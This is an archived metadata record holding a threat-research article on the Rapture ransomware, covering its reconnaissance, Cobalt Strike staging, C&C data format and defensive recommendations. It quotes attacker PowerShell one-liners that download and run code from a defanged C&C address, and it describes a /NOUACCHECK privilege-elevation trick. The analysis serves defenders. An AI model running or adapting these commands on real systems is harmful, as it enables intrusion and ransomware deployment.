{
	"id": "c232bc61-409b-4021-bf5b-b574adbf85cd",
	"created_at": "2026-04-06T00:10:54.196305Z",
	"updated_at": "2026-04-10T13:13:05.246415Z",
	"deleted_at": null,
	"sha1_hash": "e22eb00702804d36b7e5c029056dc84e9ee10d9b",
	"title": "Rapture, a Ransomware Family With Similarities to Paradise",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 491245,
	"plain_text": "Rapture, a Ransomware Family With Similarities to Paradise\r\nBy Don Ovid Ladores, Ian Kenefick, Earle Maui Earnshaw ( words)\r\nPublished: 2023-04-28 · Archived: 2026-04-05 22:38:30 UTC\r\nRansomware\r\nIn March and April 2023, we observed a type of ransomware targeting its victims via a minimalistic approach with\r\ntools that leave only a minimal footprint behind. Our findings revealed many of the preparations made by the\r\nperpetrators and how quickly they managed to carry out the ransomware attack.\r\nBy: Don Ovid Ladores, Ian Kenefick, Earle Maui Earnshaw Apr 28, 2023 Read time: 5 min (1434 words)\r\nSave to Folio\r\nIntroduction\r\nIn March and April 2023, we observed a type of ransomware targeting its victims via a minimalistic approach with\r\ntools that leave only a minimal footprint behind. Our findings revealed many of the preparations made by the\r\nperpetrators and how quickly they managed to carry out the ransomware attack.\r\nThe memory dump during the ransomware’s execution reveals an RSA key configuration file similar to that used\r\nby the Paradise ransomwarenews- cybercrime-and-digital-threats. To make analysis more difficult, the attackers\r\npacked the Rapture ransomware using Themida, a commercial packer. Rapture requires at least a .NET 4.0\r\nframework for proper execution; this suggests more similarities with Paradise, which has been known to be\r\ncompiled as a .NET executable. For this reason, we dubbed this ransomware type as Rapture, a closely related\r\nnomenclature to Paradise.\r\nIt is important to note that although it shares certain similarities with Paradise, Rapture’s behavior is different from\r\nthe former.\r\nDiscovery, reconnaissance, and staging                \r\nIn April, we found a couple of ransomware activities that appear to be injected in legitimate processes. 
By tracing\r\nthese activities back to the source process, we found that the ransomware appeared as an activity loaded into\r\nmemory from a Cobalt Strike beacon. In some instances, the attackers dropped the ransomware in a folder or drive\r\nas a *.log file:\r\n E:\\ITS.log\r\n C:\\[Redacted]\\Aps.log\r\nThe Rapture ransomware drops its notes into every traversed directory (the first six characters might appear to be\r\nrandom, but they are actually hard-coded string configurations).\r\nhttps://www.trendmicro.com/en_us/research/23/d/rapture-a-ransomware-family-with-similarities-to-paradise.html\r\nPage 1 of 6\n\n7qzxid-README.txt\r\nqiSgqu-README.txt\r\nIt then appends the same six characters as the extension of the encrypted files:\r\n*.7qzxid\r\n*.qiSgqu\r\nRapture requires certain command-line arguments (shown in Figure 2) to execute properly. Once the correct argument is\r\npassed to the malicious file, it starts the ransomware routine, as also displayed in its console window.\r\nFigure 2. Execution of the Rapture ransomware using the correct command-line arguments (top)\r\nand the console window during ransomware execution (bottom)\r\nThe dropped ransom note bears some resemblance to the Zeppelin ransomware (although we believe this is the only connection between the two). We tried to glean additional\r\ninformation from the ransom note and discovered that the Rapture ransomware has been around for a while now,\r\nbut there were no samples available during its initial sighting.\r\nDuring our investigation, we discovered that the whole infection chain spans three to five days at most (counting\r\nfrom the time of discovery of the reconnaissance commands). 
Rapture’s operators first perform the following,\r\nlikely to guarantee a more successful attack:\r\nInspect firewall policies\r\nCheck the PowerShell version\r\nCheck for vulnerable Log4J applets\r\nFigure 4. One of the PowerShell command lines found during the reconnaissance stage\r\nAfter a successful reconnaissance routine, the attackers proceed with the first stage of the attack by downloading\r\nand executing a PowerShell script to install Cobalt Strike on the target’s system.\r\nAfter the reconnaissance stage, the attackers try to gain access to the victim’s network (likely through\r\nvulnerable public-facing websites and servers, since their initial entry is via w3wp.exe for PowerShell execution).\r\nThe following command is used for the first execution instance of PowerShell through w3wp.exe:\r\n/c powershell set-alias -name aspersky -value Invoke-Expression;aspersky(New-Object\r\nNet.WebClient).DownloadString('[hxxp]://195.123.234[.]101:80/Sharepoint/Pickers.aspx')\r\nMeanwhile, the second execution instance, this time from Windows Management Instrumentation (WMI), is done\r\nvia the following command:\r\n/c powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object\r\nNet.WebClient).DownloadString('[hxxp]://195.123.234[.]101:80/Microsoft/Online')\r\nThe attackers use a unique method of obtaining higher privileges to execute the payload. By default, there is a task\r\nin newer versions of Windows called CreateExplorerShellUnelevatedTask that prevents explorer.exe from running\r\nwith elevated privileges. However, if explorer.exe is launched using the command-line switch /NOUACCHECK, it\r\ninherits the elevated status from the parent process. In this case, the malicious actors injected the malicious\r\nactivity into an existing svchost.exe, which serves as the parent process. 
The svchost.exe process then executes\r\nexplorer.exe using the /NOUACCHECK switch. Once this is done, explorer.exe can then be used to drop and\r\nexecute the second-stage Cobalt Strike beacon downloader.\r\nThe second-stage downloader then connects to the following address to download the main Cobalt Strike\r\nbeacon: 195.123.234[.]101/DoFor/review/Mcirosoft\r\nThe data response from the command-and-control (C\u0026C) server contains the encrypted beacon sandwiched in the\r\nmiddle of a JavaScript file (with the script code bearing no actual usage or significance for the malware chain).\r\nThe downloader decrypts the sandwiched code and then executes the Cobalt Strike beacon.\r\nFigure 6. The Cobalt Strike downloader C\u0026C server response containing the encrypted beacon\r\nThe second (main) stage beacon attempts to connect to another subfolder on the same C\u0026C server, where it\r\nattempts to receive the backdoor command and other payloads. 
Similarly, the response of the C\u0026C server is\r\nalso sandwiched in another JavaScript code that is decoded by the beacon, fetched from the following\r\naddress: 195.123.234[.]101/Make/v8.01/Sharepoint\r\nBased on our analysis of the decrypted C\u0026C response from the beacon, we have deduced that the decoded content\r\nhas the following structure (after the beacon removes the garbage padding):\r\nOffset | Length | Data | Description\r\n0x00 | 0x04 | N/A | Four-byte header\r\n0x04 | 0x04 | 0x04000000 | Flag (big endian; converted to little endian after decryption)\r\n0x08 | 0x04 | 0xnn000000 | Backdoor command (big endian; converted to little endian after decryption)\r\n0x0c | 0x04 | N/A | Data size, length of additional data from the response (big endian; converted to little endian after decryption)\r\n0x10 | Depends on [0x0c] | N/A | Additional data to be supplied to some of the backdoor commands\r\nTable 1. The structure of the decrypted C\u0026C server response from the beacon communication\r\nWe found that the beacon performed ransomware activities in the majority of the affected systems, which implies that\r\nthe code is downloaded and executed in memory, except for a few machines where we found the actual\r\nransomware.\r\nWe tried to gather more information about the Cobalt Strike beacon via its watermark, where we discovered that\r\nthe same watermark is also used by other threat actors. This indicates that it is likely that Rapture’s operators are\r\nusing a pirated Windows license which is also being used by several others.\r\nFigure 7. The particular Cobalt Strike watermark as seen in relation to different groups\r\nConclusion\r\nThe Rapture ransomware is cleverly designed and bears some similarities to other ransomware families such as\r\nParadise. 
Although its operators use tools and resources that are readily available, they have managed to use them\r\nin a way that enhances Rapture’s capabilities by making it stealthier and more difficult to analyze. As is the case\r\nwith many modern families, these types of fairly sophisticated ransomware are beginning to become the norm in\r\nmany present-day campaigns.\r\nRecommendations and Solutions\r\nTo protect their systems from ransomware attacks, organizations can implement security frameworks that\r\nsystematically allocate resources to establish a robust defense strategy. Here are some recommended guidelines\r\nfor organizations to consider:\r\nConduct an inventory of assets and data.\r\nIdentify authorized and unauthorized devices and software.\r\nAudit event and incident logs.\r\nManage hardware and software configurations.\r\nGrant admin privileges and access only when necessary for an employee's role.\r\nMonitor network ports, protocols, and services.\r\nEstablish a software allowlist that only allows legitimate applications to execute.\r\nImplement data protection, backup, and recovery measures.\r\nEnable multifactor authentication (MFA).\r\nDeploy the latest versions of security solutions to all layers of the system, including email, endpoint, web,\r\nand network.\r\nWatch for early signs of an attack, such as the presence of suspicious tools in the system.\r\nOrganizations can adopt a multifaceted approach to secure potential entry points into their systems, such as\r\nendpoints, email, web, and networks. By using security solutions that can detect malicious elements and\r\nquestionable activities, enterprises can protect themselves from ransomware attacks.\r\nA multilayered approach can help organizations guard possible entry points into their system (endpoint, email,\r\nweb, and network). 
Security solutions can detect malicious components and suspicious behavior, which can help\r\nprotect enterprises.\r\nTrend Micro Vision One™ provides multilayered protection and behavior detection, which helps\r\nblock questionable behavior and tools before the ransomware can do any damage.\r\nTrend Micro Cloud One™ – Workload Security protects systems against both known and\r\nunknown threats that exploit vulnerabilities. This protection is made possible through techniques such as\r\nvirtual patching and machine learning.\r\nTrend Micro™ Deep Discovery™ Email Inspector employs custom sandboxing and advanced\r\nanalysis techniques to effectively block malicious emails, including phishing emails that can serve as entry\r\npoints for ransomware.\r\nTrend Micro Apex One™ offers next-level automated threat detection and response against\r\nadvanced concerns such as fileless threats and ransomware, ensuring the protection of endpoints.\r\nIndicators of Compromise (IOCs)\r\nThe indicators of compromise for this entry can be found here.\r\nSource: https://www.trendmicro.com/en_us/research/23/d/rapture-a-ransomware-family-with-similarities-to-paradise.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/23/d/rapture-a-ransomware-family-with-similarities-to-paradise.html"
	],
	"report_names": [
		"rapture-a-ransomware-family-with-similarities-to-paradise.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434254,
	"ts_updated_at": 1775826785,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e22eb00702804d36b7e5c029056dc84e9ee10d9b.pdf",
		"text": "https://archive.orkl.eu/e22eb00702804d36b7e5c029056dc84e9ee10d9b.txt",
		"img": "https://archive.orkl.eu/e22eb00702804d36b7e5c029056dc84e9ee10d9b.jpg"
	}
}